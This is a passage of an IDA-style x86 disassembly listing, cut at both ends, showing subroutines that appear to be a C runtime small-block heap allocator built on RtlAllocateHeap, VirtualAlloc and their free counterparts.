loc_41B3A0: ; CODE XREF: sub_41B0DD+229�j
mov ecx, [ebp+var_8]
loc_41B3A3: ; CODE XREF: sub_41B0DD+2B9�j
; sub_41B0DD+2C1�j
mov esi, [ebp+var_10]
add edx, ecx
lea ecx, [esi+1]
mov [edx], ecx
mov [edx+esi-4], ecx
mov esi, [ebp+var_C]
mov ecx, [esi]
test ecx, ecx
lea edi, [ecx+1]
mov [esi], edi
jnz short loc_41B3D9
cmp ebx, ds:dword_48B674
jnz short loc_41B3D9
mov ecx, [ebp+var_4]
cmp ecx, ds:dword_48B66C
jnz short loc_41B3D9
and ds:dword_48B674, 0
loc_41B3D9: ; CODE XREF: sub_41B0DD+2E0�j
; sub_41B0DD+2E8�j ...
mov ecx, [ebp+var_4]
mov [eax], ecx
lea eax, [edx+4]
loc_41B3E1: ; CODE XREF: sub_41B0DD+F0�j
pop edi
pop esi
pop ebx
leave
retn
sub_41B0DD endp
; =============== S U B R O U T I N E =======================================
sub_41B3E6 proc near ; CODE XREF: sub_41B0DD+CC�p
mov eax, ds:dword_48B678
mov ecx, ds:dword_48B668
push esi
push edi
xor edi, edi
cmp eax, ecx
jnz short loc_41B429
lea eax, [ecx+ecx*4+50h]
shl eax, 2
push eax
push ds:dword_48B67C
push edi
push ds:dword_48B684
call ds:dword_424194 ; RtlReAllocateHeap
cmp eax, edi
jz short loc_41B479
add ds:dword_48B668, 10h
mov ds:dword_48B67C, eax
mov eax, ds:dword_48B678
loc_41B429: ; CODE XREF: sub_41B3E6+11�j
mov ecx, ds:dword_48B67C
push 41C4h
push 8
lea eax, [eax+eax*4]
push ds:dword_48B684
lea esi, [ecx+eax*4]
call ds:dword_4240E8 ; RtlAllocateHeap
cmp eax, edi
mov [esi+10h], eax
jz short loc_41B479
push 4
push 2000h
push 100000h
push edi
call ds:dword_4241B4 ; VirtualAlloc
cmp eax, edi
mov [esi+0Ch], eax
jnz short loc_41B47D
push dword ptr [esi+10h]
push edi
push ds:dword_48B684
call ds:dword_4240E4 ; RtlFreeHeap
loc_41B479: ; CODE XREF: sub_41B3E6+30�j
; sub_41B3E6+67�j
xor eax, eax
jmp short loc_41B494
; ---------------------------------------------------------------------------
loc_41B47D: ; CODE XREF: sub_41B3E6+81�j
or dword ptr [esi+8], 0FFFFFFFFh
mov [esi], edi
mov [esi+4], edi
inc ds:dword_48B678
mov eax, [esi+10h]
or dword ptr [eax], 0FFFFFFFFh
mov eax, esi
loc_41B494: ; CODE XREF: sub_41B3E6+95�j
pop edi
pop esi
retn
sub_41B3E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B497 proc near ; CODE XREF: sub_41B0DD+DB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, [ecx+10h]
mov eax, [ecx+8]
xor ebx, ebx
loc_41B4A9: ; CODE XREF: sub_41B497+19�j
test eax, eax
jl short loc_41B4B2
shl eax, 1
inc ebx
jmp short loc_41B4A9
; ---------------------------------------------------------------------------
loc_41B4B2: ; CODE XREF: sub_41B497+14�j
mov eax, ebx
push 3Fh
imul eax, 204h
pop edx
lea eax, [eax+esi+144h]
mov [ebp+var_4], eax
loc_41B4C7: ; CODE XREF: sub_41B497+3A�j
mov [eax+8], eax
mov [eax+4], eax
add eax, 8
dec edx
jnz short loc_41B4C7
mov edi, ebx
push 4
shl edi, 0Fh
add edi, [ecx+0Ch]
push 1000h
push 8000h
push edi
call ds:dword_4241B4 ; VirtualAlloc
test eax, eax
jnz short loc_41B4FA
or eax, 0FFFFFFFFh
jmp loc_41B58D
; ---------------------------------------------------------------------------
loc_41B4FA: ; CODE XREF: sub_41B497+59�j
lea edx, [edi+7000h]
cmp edi, edx
ja short loc_41B540
lea eax, [edi+10h]
loc_41B507: ; CODE XREF: sub_41B497+A7�j
or dword ptr [eax-8], 0FFFFFFFFh
or dword ptr [eax+0FECh], 0FFFFFFFFh
lea ecx, [eax+0FFCh]
mov dword ptr [eax-4], 0FF0h
mov [eax], ecx
lea ecx, [eax-1004h]
mov [eax+4], ecx
mov dword ptr [eax+0FE8h], 0FF0h
add eax, 1000h
lea ecx, [eax-10h]
cmp ecx, edx
jbe short loc_41B507
loc_41B540: ; CODE XREF: sub_41B497+6B�j
mov eax, [ebp+var_4]
lea ecx, [edi+0Ch]
add eax, 1F8h
push 1
pop edi
mov [eax+4], ecx
mov [ecx+8], eax
lea ecx, [edx+0Ch]
mov [eax+8], ecx
mov [ecx+4], eax
and dword ptr [esi+ebx*4+44h], 0
mov [esi+ebx*4+0C4h], edi
mov al, [esi+43h]
mov cl, al
inc cl
test al, al
mov eax, [ebp+arg_0]
mov [esi+43h], cl
jnz short loc_41B57D
or [eax+4], edi
loc_41B57D: ; CODE XREF: sub_41B497+E1�j
mov edx, 80000000h
mov ecx, ebx
shr edx, cl
not edx
and [eax+8], edx
mov eax, ebx
loc_41B58D: ; CODE XREF: sub_41B497+5E�j
pop edi
pop esi
pop ebx
leave
retn
sub_41B497 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B592 proc near ; CODE XREF: sub_41944F+6A�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov ecx, [ebp+arg_0]
mov eax, [ebp+arg_8]
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
mov edx, edi
lea esi, [eax+17h]
sub edx, [ecx+0Ch]
mov eax, [ecx+10h]
and esi, 0FFFFFFF0h
shr edx, 0Fh
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [edi-4]
dec ecx
cmp esi, ecx
mov [ebp+arg_8], ecx
mov ebx, [ecx+edi-4]
lea edi, [ecx+edi-4]
mov [ebp+var_4], ebx
jle loc_41B740
test bl, 1
jnz loc_41B739
add ebx, ecx
cmp esi, ebx
jg loc_41B739
mov ecx, [ebp+var_4]
sar ecx, 4
dec ecx
cmp ecx, 3Fh
mov [ebp+var_8], ecx
jbe short loc_41B609
push 3Fh
pop ecx
mov [ebp+var_8], ecx
loc_41B609: ; CODE XREF: sub_41B592+6F�j
mov ebx, [edi+4]
cmp ebx, [edi+8]
jnz short loc_41B659
cmp ecx, 20h
jnb short loc_41B635
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_41B659
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_41B659
; ---------------------------------------------------------------------------
loc_41B635: ; CODE XREF: sub_41B592+82�j
add ecx, 0FFFFFFE0h
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_41B659
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_41B659: ; CODE XREF: sub_41B592+7D�j
; sub_41B592+9A�j ...
mov ecx, [edi+8]
mov ebx, [edi+4]
mov [ecx+4], ebx
mov ecx, [edi+4]
mov edi, [edi+8]
mov [ecx+8], edi
mov ecx, [ebp+arg_8]
sub ecx, esi
add [ebp+var_4], ecx
cmp [ebp+var_4], 0
jle loc_41B727
mov edi, [ebp+var_4]
mov ecx, [ebp+arg_4]
sar edi, 4
dec edi
lea ecx, [ecx+esi-4]
cmp edi, 3Fh
jbe short loc_41B693
push 3Fh
pop edi
loc_41B693: ; CODE XREF: sub_41B592+FC�j
mov ebx, [ebp+var_C]
lea ebx, [ebx+edi*8]
mov [ebp+arg_8], ebx
mov ebx, [ebx+4]
mov [ecx+4], ebx
mov ebx, [ebp+arg_8]
mov [ecx+8], ebx
mov [ebx+4], ecx
mov ebx, [ecx+4]
mov [ebx+8], ecx
mov ebx, [ecx+4]
cmp ebx, [ecx+8]
jnz short loc_41B715
mov cl, [edi+eax+4]
cmp edi, 20h
mov byte ptr [ebp+arg_8+3], cl
inc cl
mov [edi+eax+4], cl
jnb short loc_41B6EC
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_41B6DF
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_41B6DF: ; CODE XREF: sub_41B592+13D�j
lea eax, [eax+edx*4+44h]
mov edx, 80000000h
mov ecx, edi
jmp short loc_41B711
; ---------------------------------------------------------------------------
loc_41B6EC: ; CODE XREF: sub_41B592+137�j
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_41B702
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_41B702: ; CODE XREF: sub_41B592+15E�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [edi-20h]
mov edx, 80000000h
loc_41B711: ; CODE XREF: sub_41B592+158�j
shr edx, cl
or [eax], edx
loc_41B715: ; CODE XREF: sub_41B592+125�j
mov edx, [ebp+arg_4]
mov ecx, [ebp+var_4]
lea eax, [edx+esi-4]
mov [eax], ecx
mov [ecx+eax-4], ecx
jmp short loc_41B72A
; ---------------------------------------------------------------------------
loc_41B727: ; CODE XREF: sub_41B592+E5�j
mov edx, [ebp+arg_4]
loc_41B72A: ; CODE XREF: sub_41B592+193�j
lea eax, [esi+1]
mov [edx-4], eax
mov [edx+esi-8], eax
jmp loc_41B880
; ---------------------------------------------------------------------------
loc_41B739: ; CODE XREF: sub_41B592+52�j
; sub_41B592+5C�j
xor eax, eax
jmp loc_41B883
; ---------------------------------------------------------------------------
loc_41B740: ; CODE XREF: sub_41B592+49�j
jge loc_41B880
mov ebx, [ebp+arg_4]
sub [ebp+arg_8], esi
lea ecx, [esi+1]
mov [ebx-4], ecx
lea ebx, [ebx+esi-4]
mov esi, [ebp+arg_8]
mov [ebp+arg_4], ebx
sar esi, 4
dec esi
mov [ebx-4], ecx
cmp esi, 3Fh
jbe short loc_41B76B
push 3Fh
pop esi
loc_41B76B: ; CODE XREF: sub_41B592+1D4�j
test byte ptr [ebp+var_4], 1
jnz loc_41B7FA
mov esi, [ebp+var_4]
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_41B784
push 3Fh
pop esi
loc_41B784: ; CODE XREF: sub_41B592+1ED�j
mov ecx, [edi+4]
cmp ecx, [edi+8]
jnz short loc_41B7D3
cmp esi, 20h
jnb short loc_41B7AF
mov ebx, 80000000h
mov ecx, esi
shr ebx, cl
lea esi, [esi+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [esi]
jnz short loc_41B7D0
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_41B7D0
; ---------------------------------------------------------------------------
loc_41B7AF: ; CODE XREF: sub_41B592+1FD�j
lea ecx, [esi-20h]
mov ebx, 80000000h
shr ebx, cl
lea ecx, [esi+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_41B7D0
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_41B7D0: ; CODE XREF: sub_41B592+214�j
; sub_41B592+21B�j ...
mov ebx, [ebp+arg_4]
loc_41B7D3: ; CODE XREF: sub_41B592+1F8�j
mov ecx, [edi+8]
mov esi, [edi+4]
mov [ecx+4], esi
mov ecx, [edi+4]
mov esi, [edi+8]
mov [ecx+8], esi
mov esi, [ebp+arg_8]
add esi, [ebp+var_4]
mov [ebp+arg_8], esi
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_41B7FA
push 3Fh
pop esi
loc_41B7FA: ; CODE XREF: sub_41B592+1DD�j
; sub_41B592+263�j
mov ecx, [ebp+var_C]
mov edi, [ecx+esi*8+4]
lea ecx, [ecx+esi*8]
mov [ebx+4], edi
mov [ebx+8], ecx
mov [ecx+4], ebx
mov ecx, [ebx+4]
mov [ecx+8], ebx
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_41B877
mov cl, [esi+eax+4]
cmp esi, 20h
mov byte ptr [ebp+arg_4+3], cl
inc cl
mov [esi+eax+4], cl
jnb short loc_41B84E
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_41B841
mov edi, 80000000h
mov ecx, esi
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx], edi
loc_41B841: ; CODE XREF: sub_41B592+29F�j
lea eax, [eax+edx*4+44h]
mov edx, 80000000h
mov ecx, esi
jmp short loc_41B873
; ---------------------------------------------------------------------------
loc_41B84E: ; CODE XREF: sub_41B592+299�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_41B864
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx+4], edi
loc_41B864: ; CODE XREF: sub_41B592+2C0�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [esi-20h]
mov edx, 80000000h
loc_41B873: ; CODE XREF: sub_41B592+2BA�j
shr edx, cl
or [eax], edx
loc_41B877: ; CODE XREF: sub_41B592+287�j
mov eax, [ebp+arg_8]
mov [ebx], eax
mov [eax+ebx-4], eax
loc_41B880: ; CODE XREF: sub_41B592+1A2�j
; sub_41B592:loc_41B740�j
push 1
pop eax
loc_41B883: ; CODE XREF: sub_41B592+1A9�j
pop edi
pop esi
pop ebx
leave
retn
sub_41B592 endp
; =============== S U B R O U T I N E =======================================
sub_41B888 proc near ; CODE XREF: sub_41ACE4+41�p
; sub_41BB80:loc_41BD4F�p
cmp ds:dword_4397D0, 0FFFFFFFFh
push ebx
push ebp
push esi
push edi
jnz short loc_41B89C
mov esi, offset off_4397C0
jmp short loc_41B8B9
; ---------------------------------------------------------------------------
loc_41B89C: ; CODE XREF: sub_41B888+B�j
push 2020h
push 0
push ds:dword_48B684
call ds:dword_4240E8 ; RtlAllocateHeap
mov esi, eax
test esi, esi
jz loc_41B9C5
loc_41B8B9: ; CODE XREF: sub_41B888+12�j
mov ebp, ds:dword_4241B4
push 4
push 2000h
push 400000h
push 0
call ebp ; VirtualAlloc
mov edi, eax
test edi, edi
jz loc_41B9AE
push 4
mov ebx, 10000h
push 1000h
push ebx
push edi
call ebp ; VirtualAlloc
test eax, eax
jz loc_41B9A0
mov eax, offset off_4397C0
cmp esi, eax
jnz short loc_41B918
cmp ds:off_4397C0, 0
jnz short loc_41B908
mov ds:off_4397C0, eax
loc_41B908: ; CODE XREF: sub_41B888+79�j
cmp ds:off_4397C4, 0
jnz short loc_41B92D
mov ds:off_4397C4, eax
jmp short loc_41B92D
; ---------------------------------------------------------------------------
loc_41B918: ; CODE XREF: sub_41B888+70�j
mov [esi], eax
mov eax, ds:off_4397C4
mov [esi+4], eax
mov ds:off_4397C4, esi
mov eax, [esi+4]
mov [eax], esi
loc_41B92D: ; CODE XREF: sub_41B888+87�j
; sub_41B888+8E�j
lea eax, [edi+400000h]
lea ecx, [esi+98h]
mov [esi+14h], eax
lea eax, [esi+18h]
mov [esi+0Ch], ecx
mov [esi+10h], edi
mov [esi+8], eax
xor ebp, ebp
mov ecx, 0F1h
loc_41B94F: ; CODE XREF: sub_41B888+E2�j
xor edx, edx
cmp ebp, 10h
setnl dl
dec edx
and edx, ecx
dec edx
inc ebp
mov [eax], edx
mov [eax+4], ecx
add eax, 8
cmp ebp, 400h
jl short loc_41B94F
push ebx
push 0
push edi
call sub_417330
add esp, 0Ch
loc_41B978: ; CODE XREF: sub_41B888+112�j
mov eax, [esi+10h]
add eax, ebx
cmp edi, eax
jnb short loc_41B99C
or byte ptr [edi+0F8h], 0FFh
lea eax, [edi+8]
mov [edi], eax
mov dword ptr [edi+4], 0F0h
add edi, 1000h
jmp short loc_41B978
; ---------------------------------------------------------------------------
loc_41B99C: ; CODE XREF: sub_41B888+F7�j
mov eax, esi
jmp short loc_41B9C7
; ---------------------------------------------------------------------------
loc_41B9A0: ; CODE XREF: sub_41B888+63�j
push 8000h
push 0
push edi
call ds:dword_4241B0 ; VirtualFree
loc_41B9AE: ; CODE XREF: sub_41B888+4B�j
cmp esi, offset off_4397C0
jz short loc_41B9C5
push esi
push 0
push ds:dword_48B684
call ds:dword_4240E4 ; RtlFreeHeap
loc_41B9C5: ; CODE XREF: sub_41B888+2B�j
; sub_41B888+12C�j
xor eax, eax
loc_41B9C7: ; CODE XREF: sub_41B888+116�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_41B888 endp
; =============== S U B R O U T I N E =======================================
sub_41B9CC proc near ; CODE XREF: sub_41BA22+A5�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push 8000h
push 0
push dword ptr [esi+10h]
call ds:dword_4241B0 ; VirtualFree
cmp ds:off_43B7E0, esi
jnz short loc_41B9F1
mov eax, [esi+4]
mov ds:off_43B7E0, eax
loc_41B9F1: ; CODE XREF: sub_41B9CC+1B�j
cmp esi, offset off_4397C0
jz short loc_41BA19
mov eax, [esi+4]
mov ecx, [esi]
push esi
push 0
mov [eax], ecx
mov eax, [esi]
mov ecx, [esi+4]
mov [eax+4], ecx
push ds:dword_48B684
call ds:dword_4240E4 ; RtlFreeHeap
pop esi
retn
; ---------------------------------------------------------------------------
loc_41BA19: ; CODE XREF: sub_41B9CC+2B�j
or ds:dword_4397D0, 0FFFFFFFFh
pop esi
retn
sub_41B9CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BA22 proc near ; CODE XREF: sub_41BB3B+3E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, ds:off_4397C4
push edi
loc_41BA2F: ; CODE XREF: sub_41BA22+B7�j
cmp dword ptr [esi+10h], 0FFFFFFFFh
jz loc_41BACD
and [ebp+var_4], 0
lea edi, [esi+2010h]
mov ebx, 3FF000h
loc_41BA48: ; CODE XREF: sub_41BA22+72�j
cmp dword ptr [edi], 0F0h
jnz short loc_41BA89
mov eax, ebx
push 4000h
add eax, [esi+10h]
push 1000h
push eax
call ds:dword_4241B0 ; VirtualFree
test eax, eax
jz short loc_41BA89
or dword ptr [edi], 0FFFFFFFFh
dec ds:dword_48A07C
mov eax, [esi+0Ch]
test eax, eax
jz short loc_41BA7E
cmp eax, edi
jbe short loc_41BA81
loc_41BA7E: ; CODE XREF: sub_41BA22+56�j
mov [esi+0Ch], edi
loc_41BA81: ; CODE XREF: sub_41BA22+5A�j
inc [ebp+var_4]
dec [ebp+arg_0]
jz short loc_41BA96
loc_41BA89: ; CODE XREF: sub_41BA22+2C�j
; sub_41BA22+46�j
sub ebx, 1000h
sub edi, 8
test ebx, ebx
jge short loc_41BA48
loc_41BA96: ; CODE XREF: sub_41BA22+65�j
cmp [ebp+var_4], 0
mov ecx, esi
mov esi, [esi+4]
jz short loc_41BACD
cmp dword ptr [ecx+18h], 0FFFFFFFFh
jnz short loc_41BACD
push 1
lea eax, [ecx+20h]
pop edx
loc_41BAAD: ; CODE XREF: sub_41BA22+9A�j
cmp dword ptr [eax], 0FFFFFFFFh
jnz short loc_41BABE
inc edx
add eax, 8
cmp edx, 400h
jl short loc_41BAAD
loc_41BABE: ; CODE XREF: sub_41BA22+8E�j
cmp edx, 400h
jnz short loc_41BACD
push ecx
call sub_41B9CC
pop ecx
loc_41BACD: ; CODE XREF: sub_41BA22+11�j
; sub_41BA22+7D�j ...
cmp esi, ds:off_4397C4
jz short loc_41BADF
cmp [ebp+arg_0], 0
jg loc_41BA2F
loc_41BADF: ; CODE XREF: sub_41BA22+B1�j
pop edi
pop esi
pop ebx
leave
retn
sub_41BA22 endp
; =============== S U B R O U T I N E =======================================
sub_41BAE4 proc near ; CODE XREF: sub_417C3B+3A�p
; sub_41944F+173�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
mov edx, offset off_4397C0
push esi
mov ecx, edx
loc_41BAF0: ; CODE XREF: sub_41BAE4+1C�j
cmp eax, [ecx+10h]
jbe short loc_41BAFA
cmp eax, [ecx+14h]
jb short loc_41BB02
loc_41BAFA: ; CODE XREF: sub_41BAE4+F�j
mov ecx, [ecx]
cmp ecx, edx
jz short loc_41BB37
jmp short loc_41BAF0
; ---------------------------------------------------------------------------
loc_41BB02: ; CODE XREF: sub_41BAE4+14�j
test al, 0Fh
jnz short loc_41BB37
mov esi, eax
mov edx, 100h
and esi, 0FFFh
cmp esi, edx
jb short loc_41BB37
mov esi, [esp+4+arg_4]
mov [esi], ecx
mov esi, [esp+4+arg_8]
mov ecx, eax
and cx, 0F000h
sub eax, ecx
mov [esi], ecx
sub eax, edx
pop esi
sar eax, 4
lea eax, [eax+ecx+8]
retn
; ---------------------------------------------------------------------------
loc_41BB37: ; CODE XREF: sub_41BAE4+1A�j
; sub_41BAE4+20�j ...
xor eax, eax
pop esi
retn
sub_41BAE4 endp
; =============== S U B R O U T I N E =======================================
sub_41BB3B proc near ; CODE XREF: sub_417C3B+4D�p
; sub_41944F+1D5�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
mov ecx, [esp+arg_4]
sub ecx, [eax+10h]
sar ecx, 0Ch
lea eax, [eax+ecx*8+18h]
mov ecx, [esp+arg_8]
movzx edx, byte ptr [ecx]
add [eax], edx
and byte ptr [ecx], 0
cmp dword ptr [eax], 0F0h
mov dword ptr [eax+4], 0F1h
jnz short locret_41BB7F
inc ds:dword_48A07C
cmp ds:dword_48A07C, 20h
jnz short locret_41BB7F
push 10h
call sub_41BA22
pop ecx
locret_41BB7F: ; CODE XREF: sub_41BB3B+2B�j
; sub_41BB3B+3A�j
retn
sub_41BB3B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BB80 proc near ; CODE XREF: sub_417BC7+4A�p
; sub_41944F+1AC�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, ds:off_43B7E0
push edi
loc_41BB8E: ; CODE XREF: sub_41BB80+C6�j
mov edx, [esi+10h]
cmp edx, 0FFFFFFFFh
jz loc_41BC39
mov edi, [esi+8]
lea ecx, [esi+2018h]
mov eax, edi
sub eax, esi
sub eax, 18h
sar eax, 3
shl eax, 0Ch
add eax, edx
cmp edi, ecx
mov [ebp+var_4], eax
jnb short loc_41BBF3
loc_41BBB9: ; CODE XREF: sub_41BB80+6F�j
mov ecx, [edi]
mov ebx, [ebp+arg_0]
cmp ecx, ebx
jl short loc_41BBDC
cmp [edi+4], ebx
jbe short loc_41BBDC
push ebx
push ecx
push eax
call sub_41BD88
add esp, 0Ch
test eax, eax
jnz short loc_41BC4B
mov eax, [ebp+var_4]
mov [edi+4], ebx
loc_41BBDC: ; CODE XREF: sub_41BB80+40�j
; sub_41BB80+45�j
add edi, 8
lea ecx, [esi+2018h]
add eax, 1000h
cmp edi, ecx
mov [ebp+var_4], eax
jb short loc_41BBB9
jmp short loc_41BBF6
; ---------------------------------------------------------------------------
loc_41BBF3: ; CODE XREF: sub_41BB80+37�j
mov ebx, [ebp+arg_0]
loc_41BBF6: ; CODE XREF: sub_41BB80+71�j
mov eax, [esi+8]
mov ecx, [esi+10h]
lea edi, [esi+18h]
mov [ebp+var_8], eax
cmp edi, eax
mov [ebp+var_4], ecx
jnb short loc_41BC3C
loc_41BC09: ; CODE XREF: sub_41BB80+B5�j
mov eax, [edi]
cmp eax, ebx
jl short loc_41BC28
cmp [edi+4], ebx
jbe short loc_41BC28
push ebx
push eax
push [ebp+var_4]
call sub_41BD88
add esp, 0Ch
test eax, eax
jnz short loc_41BC4B
mov [edi+4], ebx
loc_41BC28: ; CODE XREF: sub_41BB80+8D�j
; sub_41BB80+92�j
add [ebp+var_4], 1000h
add edi, 8
cmp edi, [ebp+var_8]
jb short loc_41BC09
jmp short loc_41BC3C
; ---------------------------------------------------------------------------
loc_41BC39: ; CODE XREF: sub_41BB80+14�j
mov ebx, [ebp+arg_0]
loc_41BC3C: ; CODE XREF: sub_41BB80+87�j
; sub_41BB80+B7�j
mov esi, [esi]
cmp esi, ds:off_43B7E0
jz short loc_41BC5B
jmp loc_41BB8E
; ---------------------------------------------------------------------------
loc_41BC4B: ; CODE XREF: sub_41BB80+54�j
; sub_41BB80+A3�j
mov ds:off_43B7E0, esi
sub [edi], ebx
mov [esi+8], edi
jmp loc_41BD83
; ---------------------------------------------------------------------------
loc_41BC5B: ; CODE XREF: sub_41BB80+C4�j
mov eax, offset off_4397C0
mov edi, eax
loc_41BC62: ; CODE XREF: sub_41BB80+F8�j
cmp dword ptr [edi+10h], 0FFFFFFFFh
jz short loc_41BC6E
cmp dword ptr [edi+0Ch], 0
jnz short loc_41BC7A
loc_41BC6E: ; CODE XREF: sub_41BB80+E6�j
mov edi, [edi]
cmp edi, eax
jz loc_41BD4F
jmp short loc_41BC62
; ---------------------------------------------------------------------------
loc_41BC7A: ; CODE XREF: sub_41BB80+EC�j
mov ebx, [edi+0Ch]
and [ebp+var_4], 0
mov esi, ebx
mov eax, ebx
sub esi, edi
sub esi, 18h
sar esi, 3
shl esi, 0Ch
add esi, [edi+10h]
cmp dword ptr [ebx], 0FFFFFFFFh
jnz short loc_41BCA9
loc_41BC98: ; CODE XREF: sub_41BB80+127�j
cmp [ebp+var_4], 10h
jge short loc_41BCA9
add eax, 8
inc [ebp+var_4]
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_41BC98
loc_41BCA9: ; CODE XREF: sub_41BB80+116�j
; sub_41BB80+11C�j
mov eax, [ebp+var_4]
push 4
shl eax, 0Ch
push 1000h
push eax
push esi
mov [ebp+var_8], eax
call ds:dword_4241B4 ; VirtualAlloc
cmp eax, esi
jnz loc_41BD81
push 0
push [ebp+var_8]
push esi
call sub_417330
mov edx, [ebp+var_4]
add esp, 0Ch
test edx, edx
mov ecx, ebx
jle short loc_41BD10
lea eax, [esi+4]
mov [ebp+var_4], edx
loc_41BCE6: ; CODE XREF: sub_41BB80+18E�j
or byte ptr [eax+0F4h], 0FFh
lea edx, [eax+4]
mov [eax-4], edx
mov edx, 0F0h
mov [eax], edx
mov [ecx], edx
mov dword ptr [ecx+4], 0F1h
add eax, 1000h
add ecx, 8
dec [ebp+var_4]
jnz short loc_41BCE6
loc_41BD10: ; CODE XREF: sub_41BB80+15E�j
mov ds:off_43B7E0, edi
lea eax, [edi+2018h]
loc_41BD1C: ; CODE XREF: sub_41BB80+1A8�j
cmp ecx, eax
jnb short loc_41BD2C
cmp dword ptr [ecx], 0FFFFFFFFh
jz short loc_41BD2A
add ecx, 8
jmp short loc_41BD1C
; ---------------------------------------------------------------------------
loc_41BD2A: ; CODE XREF: sub_41BB80+1A3�j
cmp ecx, eax
loc_41BD2C: ; CODE XREF: sub_41BB80+19E�j
sbb eax, eax
and eax, ecx
mov [edi+0Ch], eax
mov eax, [ebp+arg_0]
mov [esi+8], al
mov [edi+8], ebx
sub [ebx], eax
sub [esi+4], eax
lea ecx, [esi+eax+8]
lea eax, [esi+100h]
mov [esi], ecx
jmp short loc_41BD83
; ---------------------------------------------------------------------------
loc_41BD4F: ; CODE XREF: sub_41BB80+F2�j
call sub_41B888
test eax, eax
jz short loc_41BD81
mov ecx, [eax+10h]
mov [ecx+8], bl
lea edx, [ecx+ebx+8]
mov ds:off_43B7E0, eax
mov [ecx], edx
mov edx, 0F0h
sub edx, ebx
mov [ecx+4], edx
movzx edx, bl
sub [eax+18h], edx
lea eax, [ecx+100h]
jmp short loc_41BD83
; ---------------------------------------------------------------------------
loc_41BD81: ; CODE XREF: sub_41BB80+143�j
; sub_41BB80+1D6�j
xor eax, eax
loc_41BD83: ; CODE XREF: sub_41BB80+D6�j
; sub_41BB80+1CD�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41BB80 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BD88 proc near ; CODE XREF: sub_41BB80+4A�p
; sub_41BB80+99�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
mov edx, [ebp+arg_8]
push ebx
push esi
mov esi, [ecx+4]
push edi
mov edi, [ecx]
lea ebx, [ecx+0F8h]
cmp esi, edx
mov [ebp+var_4], edi
mov eax, edi
mov [ebp+arg_0], ebx
jb short loc_41BDCD
lea eax, [edi+edx]
mov [edi], dl
cmp eax, ebx
jnb short loc_41BDBC
add [ecx], edx
sub [ecx+4], edx
jmp short loc_41BDC5
; ---------------------------------------------------------------------------
loc_41BDBC: ; CODE XREF: sub_41BD88+2B�j
and dword ptr [ecx+4], 0
lea eax, [ecx+8]
mov [ecx], eax
loc_41BDC5: ; CODE XREF: sub_41BD88+32�j
lea eax, [edi+8]
jmp loc_41BE9B
; ---------------------------------------------------------------------------
loc_41BDCD: ; CODE XREF: sub_41BD88+22�j
add esi, edi
cmp byte ptr [esi], 0
jz short loc_41BDD6
mov eax, esi
loc_41BDD6: ; CODE XREF: sub_41BD88+4A�j
lea esi, [eax+edx]
cmp esi, ebx
jnb short loc_41BE20
loc_41BDDD: ; CODE XREF: sub_41BD88+96�j
mov bl, [eax]
test bl, bl
jnz short loc_41BE13
push 1
lea ebx, [eax+1]
pop esi
loc_41BDE9: ; CODE XREF: sub_41BD88+68�j
cmp byte ptr [ebx], 0
jnz short loc_41BDF2
inc ebx
inc esi
jmp short loc_41BDE9
; ---------------------------------------------------------------------------
loc_41BDF2: ; CODE XREF: sub_41BD88+64�j
